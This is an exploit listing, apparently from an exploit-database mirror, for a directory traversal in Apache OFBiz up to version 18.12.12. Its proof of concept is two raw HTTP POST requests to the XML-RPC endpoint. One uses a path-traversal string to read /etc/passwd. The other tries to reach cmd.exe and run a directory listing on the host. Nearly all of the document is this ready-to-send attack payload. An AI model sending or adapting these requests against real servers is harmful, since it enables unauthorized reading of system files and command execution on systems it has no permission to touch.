Share
## https://sploitus.com/exploit?id=PACKETSTORM:178632
# Exploit Title: Apache OFBiz 18.12.12 - Directory Traversal  
# Google Dork: N/A  
# Date: 2024-05-16  
# Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly)  
# Vendor Homepage: https://ofbiz.apache.org/  
## Software Link: https://ofbiz.apache.org/download.html  
# Version: below <=18.12.12  
# Tested on: Windows10  
  
  
Poc.  
1-  
POST /webtools/control/xmlrpc HTTP/1.1  
Host: vulnerable-host.com  
Content-Type: text/xml  
  
<?xml version="1.0"?>  
<methodCall>  
<methodName>example.createBlogPost</methodName>  
<params>  
<param>  
<value><string>../../../../../../etc/passwd</string></value>  
</param>  
</params>  
</methodCall>  
  
OR  
  
2-  
POST /webtools/control/xmlrpc HTTP/1.1  
Host: vulnerable-host.com  
Content-Type: text/xml  
  
<?xml version="1.0"?>  
<methodCall>  
<methodName>performCommand</methodName>  
<params>  
<param>  
  
<value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>  
</param>  
</params>  
</methodCall>